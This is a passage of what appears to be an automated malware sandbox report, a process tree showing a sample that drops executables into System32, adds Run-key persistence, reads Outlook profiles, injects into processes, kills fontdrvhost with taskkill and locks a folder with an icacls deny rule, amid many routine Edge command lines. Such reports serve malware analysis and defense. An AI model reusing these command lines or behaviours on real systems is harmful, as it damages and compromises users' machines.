                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:2652
                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:4016
                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:944
                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6248 /prefetch:8
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:6396
                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6248 /prefetch:8
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:5084
                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:1
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:6860
                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:6092
                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc435a46f8,0x7ffc435a4708,0x7ffc435a4718
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:5596
                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,12046222823570284283,11884039878247185374,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:5388
                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,12046222823570284283,11884039878247185374,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                  PID:6456
                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:4904
                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc435a46f8,0x7ffc435a4708,0x7ffc435a4718
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:1300
                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,11225495575981365362,3006042698811299335,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:4412
                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,11225495575981365362,3006042698811299335,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:3
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        PID:7164
                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                    timeout /t 15
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                    PID:5760
                                                                                                                                                                                                  • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                    xcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                    PID:5168
                                                                                                                                                                                                  • C:\Windows\SysWOW64\regedit.exe
                                                                                                                                                                                                    regedit
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                    • Runs regedit.exe
                                                                                                                                                                                                    PID:6164
                                                                                                                                                                                                  • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                    xcopy C:\Windows\WinSxS C:\Users\Admin\Desktop
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                    PID:6160
                                                                                                                                                                                                  • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                    xcopy regmess.exe C:\Users\Admin\Desktop
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                    PID:4884
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\jaffa.exe
                                                                                                                                                                                                    jaffa.exe
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                    PID:4084
                                                                                                                                                                                                    • C:\Windows\SysWOW64\goqabvnnwp.exe
                                                                                                                                                                                                      goqabvnnwp.exe
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Modifies visibility of file extensions in Explorer
                                                                                                                                                                                                      • Modifies visiblity of hidden/system files in Explorer
                                                                                                                                                                                                      • Windows security bypass
                                                                                                                                                                                                      • Disables RegEdit via registry modification
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Windows security modification
                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                      • Modifies WinLogon
                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                      PID:5216
                                                                                                                                                                                                      • C:\Windows\SysWOW64\xwsrwnbm.exe
                                                                                                                                                                                                        C:\Windows\system32\xwsrwnbm.exe
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                        PID:3892
                                                                                                                                                                                                    • C:\Windows\SysWOW64\jzhwakyvvosbjmz.exe
                                                                                                                                                                                                      jzhwakyvvosbjmz.exe
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                      PID:5352
                                                                                                                                                                                                    • C:\Windows\SysWOW64\xwsrwnbm.exe
                                                                                                                                                                                                      xwsrwnbm.exe
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      PID:924
                                                                                                                                                                                                    • C:\Windows\SysWOW64\hmhxytmhryech.exe
                                                                                                                                                                                                      hmhxytmhryech.exe
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      PID:1304
                                                                                                                                                                                                    • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                                                                                                                                                                                      "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Windows\mydoc.rtf" /o ""
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                      • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                      PID:4176
                                                                                                                                                                                                      • C:\Windows\splwow64.exe
                                                                                                                                                                                                        C:\Windows\splwow64.exe 12288
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:2648
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\helper.vbs"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      PID:876
                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\web3.htm
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                                                      PID:1788
                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc435a46f8,0x7ffc435a4708,0x7ffc435a4718
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:1688
                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:7048
                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:2224
                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2520 /prefetch:8
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:4296
                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:1
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:2416
                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:2800
                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4260 /prefetch:1
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:5512
                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:1
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:4740
                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:4400
                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5504 /prefetch:8
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:2624
                                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5504 /prefetch:8
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:4124
                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4376 /prefetch:1
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:5028
                                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:844
                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:4848
                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:6700
                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4184 /prefetch:2
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:5100
                                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,10642512602609203620,14259389707856794445,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:3980
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\jkka.exe
                                                                                                                                                                                                                                        jkka.exe
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                        PID:2220
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                          • Drops startup file
                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                          • NTFS ADS
                                                                                                                                                                                                                                          PID:5516
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                            PID:1364
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Accesses Microsoft Outlook profiles
                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                              • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                              • outlook_office_path
                                                                                                                                                                                                                                              • outlook_win_path
                                                                                                                                                                                                                                              PID:4412
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe" 2 4412 240828203
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              PID:5672
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                        taskkill /f /im fontdrvhost.exe
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                        PID:7128
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\selfaware.exe
                                                                                                                                                                                                                                        selfaware.exe
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                        PID:6468
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\selfaware.exe
                                                                                                                                                                                                                                          selfaware.exe
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                                          PID:1684
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                            icacls "C:\Users\Admin\AppData\Local\a3a657da-b710-41f3-baf4-9fe218840fd0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                            • Possible privilege escalation attempt
                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                            PID:6560
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\selfaware.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\selfaware.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
